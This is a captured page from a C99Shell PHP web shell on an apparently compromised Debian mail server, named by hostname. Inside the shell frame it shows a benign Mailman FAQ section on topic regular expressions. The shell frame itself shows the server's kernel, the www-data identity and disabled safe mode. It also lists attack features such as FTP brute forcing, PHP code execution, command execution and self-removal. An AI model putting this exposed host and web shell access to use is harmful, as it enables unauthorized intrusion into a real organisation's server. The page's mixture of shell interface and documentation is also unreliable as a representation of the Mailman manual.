!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/mailman/mailman-member/   drwxr-xr-x
Free 130.05 GB of 142.11 GB (91.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     node30.html (7.62 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
9.1 How do I make sure that my post has the right topic?


9.1 How do I make sure that my post has the right topic?

When a list administrator defines a topic, he or she sets three things:

  • a topic name
  • a regular expression (regexp)
  • a description

You can view this information by logging in to your member options page. (See Section 3.1 for more details on how to do this.) and clicking on the "details" link for any topic that interests you.

To post on a given topic, you need to make sure that the Keywords: or Subject: headers in a message match the regular expression for that topic. Regular expressions can actually be fairly complex, so you may want to just ask the list administrator if you don't know how to make heads or tails of the expression given.

Most Mailman topic expressions will be fairly simple regular expressions, so in this document we will simply give you some common examples. Regular expressions are a bit too complex to teach in a few lines here, so if you really want to understand how the regular expressions work, you should find a tutorial or reference elsewhere. (For example, DevShed has a decent tutorial at http://www.devshed.com/Server_Side/Administration/RegExp/)

Here are some examples of possible regular expressions and matching lines:

Regular expression Matching lines
zuff Keywords: zuff
zuff Keywords: ZUFF
zuff Keywords: Zuff
zuff Keywords: amaryllis, zuff, applesauce
zuff Subject: [zuff] Do you have the right stuff for zuff?
zuff Subject: Do you have the right stuff for zuff?
zuff Subject: What is zuff?
\[zuff\] Keywords: [zuff]
\[zuff\] Subject: [zuff] Do you have the right stuff?
\[zuff\] Subject: Online zuff tutorials (was Re: [zuff] What is zuff?)

A few notes:

  • The matching is case-insensitive, so if zuff matches, so will ZUFF, zuFF, and any other variations in capitalization.
  • Some characters have special meaning in a regular expression, so to match those characters specifically, they must be "escaped" with a backslash (\). As you can see in the above example, [ and ] are such characters. (Others include ".", "?", and "*"). The backslash is also used for other things (I wasn't kidding about regular expressions being complex: consult other documentation for details about other uses of the backslash character), but this is the most likely use in a topic expression.


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0084 ]--